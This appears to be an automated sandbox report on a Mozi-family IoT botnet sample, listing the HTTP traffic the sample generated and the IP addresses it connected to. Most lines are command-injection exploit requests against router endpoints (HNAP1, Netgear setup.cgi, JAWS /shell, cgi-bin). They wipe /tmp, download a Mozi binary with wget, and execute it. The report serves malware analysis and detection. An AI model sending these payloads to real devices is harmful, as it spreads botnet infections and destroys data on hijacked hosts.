Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 45.148.37.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 123.110.194.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 154.3.84.96:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 185.36.171.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.88.13.234:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Sample listens on a socket

Source: /tmp/nT7K5GG5km (PID: 4623)

Socket: 0.0.0.0::44040

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 173.128.113.111
Source: unknown	TCP traffic detected without corresponding DNS query: 151.70.88.212
Source: unknown	TCP traffic detected without corresponding DNS query: 37.127.116.2
Source: unknown	TCP traffic detected without corresponding DNS query: 73.213.225.252
Source: unknown	TCP traffic detected without corresponding DNS query: 164.95.80.124
Source: unknown	TCP traffic detected without corresponding DNS query: 3.220.46.172
Source: unknown	TCP traffic detected without corresponding DNS query: 65.119.165.128
Source: unknown	TCP traffic detected without corresponding DNS query: 159.30.196.217
Source: unknown	TCP traffic detected without corresponding DNS query: 112.60.138.223
Source: unknown	TCP traffic detected without corresponding DNS query: 54.72.49.99
Source: unknown	TCP traffic detected without corresponding DNS query: 159.134.45.88
Source: unknown	TCP traffic detected without corresponding DNS query: 169.108.151.225
Source: unknown	TCP traffic detected without corresponding DNS query: 46.69.243.160
Source: unknown	TCP traffic detected without corresponding DNS query: 159.184.117.36
Source: unknown	TCP traffic detected without corresponding DNS query: 45.71.81.134
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.196.152
Source: unknown	TCP traffic detected without corresponding DNS query: 187.65.235.163
Source: unknown	TCP traffic detected without corresponding DNS query: 133.182.208.68
Source: unknown	TCP traffic detected without corresponding DNS query: 105.202.173.103
Source: unknown	TCP traffic detected without corresponding DNS query: 192.37.11.14
Source: unknown	TCP traffic detected without corresponding DNS query: 128.34.103.41
Source: unknown	TCP traffic detected without corresponding DNS query: 65.169.70.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.146.156.163
Source: unknown	TCP traffic detected without corresponding DNS query: 96.200.64.71
Source: unknown	TCP traffic detected without corresponding DNS query: 122.157.60.54
Source: unknown	TCP traffic detected without corresponding DNS query: 99.231.44.225
Source: unknown	TCP traffic detected without corresponding DNS query: 88.83.215.123
Source: unknown	TCP traffic detected without corresponding DNS query: 112.188.233.56
Source: unknown	TCP traffic detected without corresponding DNS query: 106.180.217.144
Source: unknown	TCP traffic detected without corresponding DNS query: 177.228.76.105
Source: unknown	TCP traffic detected without corresponding DNS query: 196.250.243.57
Source: unknown	TCP traffic detected without corresponding DNS query: 80.6.216.131
Source: unknown	TCP traffic detected without corresponding DNS query: 151.160.250.99
Source: unknown	TCP traffic detected without corresponding DNS query: 141.215.180.231
Source: unknown	TCP traffic detected without corresponding DNS query: 18.21.159.227
Source: unknown	TCP traffic detected without corresponding DNS query: 53.12.181.226
Source: unknown	TCP traffic detected without corresponding DNS query: 72.240.24.193
Source: unknown	TCP traffic detected without corresponding DNS query: 168.237.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 60.222.236.176
Source: unknown	TCP traffic detected without corresponding DNS query: 45.220.233.11
Source: unknown	TCP traffic detected without corresponding DNS query: 54.48.115.122
Source: unknown	TCP traffic detected without corresponding DNS query: 65.123.42.165
Source: unknown	TCP traffic detected without corresponding DNS query: 188.61.141.250
Source: unknown	TCP traffic detected without corresponding DNS query: 189.51.61.124
Source: unknown	TCP traffic detected without corresponding DNS query: 99.79.97.187
Source: unknown	TCP traffic detected without corresponding DNS query: 82.32.209.151
Source: unknown	TCP traffic detected without corresponding DNS query: 111.39.224.122
Source: unknown	TCP traffic detected without corresponding DNS query: 54.139.218.167
Source: unknown	TCP traffic detected without corresponding DNS query: 218.150.197.195
Source: unknown	TCP traffic detected without corresponding DNS query: 111.99.121.168

Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 112.125.239.197:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 147.46.176.166:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.22.17.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 1.34.1.251:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 46.249.83.253:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.109.201.46:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 89.129.183.215:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 188.106.17.156:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
